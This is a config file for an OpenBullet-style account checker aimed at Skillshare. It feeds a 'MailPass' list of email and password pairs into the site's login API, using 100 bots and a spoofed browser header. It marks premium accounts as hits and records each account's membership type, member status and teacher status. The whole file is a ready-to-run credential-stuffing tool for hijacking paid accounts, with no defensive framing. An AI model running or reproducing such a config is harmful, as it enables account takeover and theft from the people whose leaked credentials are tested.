[SETTINGS]
{
  "Name": "skillshshare",
  "SuggestedBots": 100,
  "LastModified": "2018-06-12T05:20:29.0664643+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://api.skillshare.com/login" AutoRedirect=TRUE 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "400" 
    KEY "Basic Member" 
  KEYCHAIN Success OR 
    KEY "Premium Member" 
PARSE "<SOURCE>" JSON "membership_label" Recursive=FALSE -> CAP "MEMBERSHIP TYPE" "" "" 
PARSE "<SOURCE>" JSON "is_member" Recursive=FALSE -> CAP "IS MEMBER" "" "" 
PARSE "<SOURCE>" JSON "is_teacher" Recursive=FALSE -> CAP "IS TEACHER" "" "" 
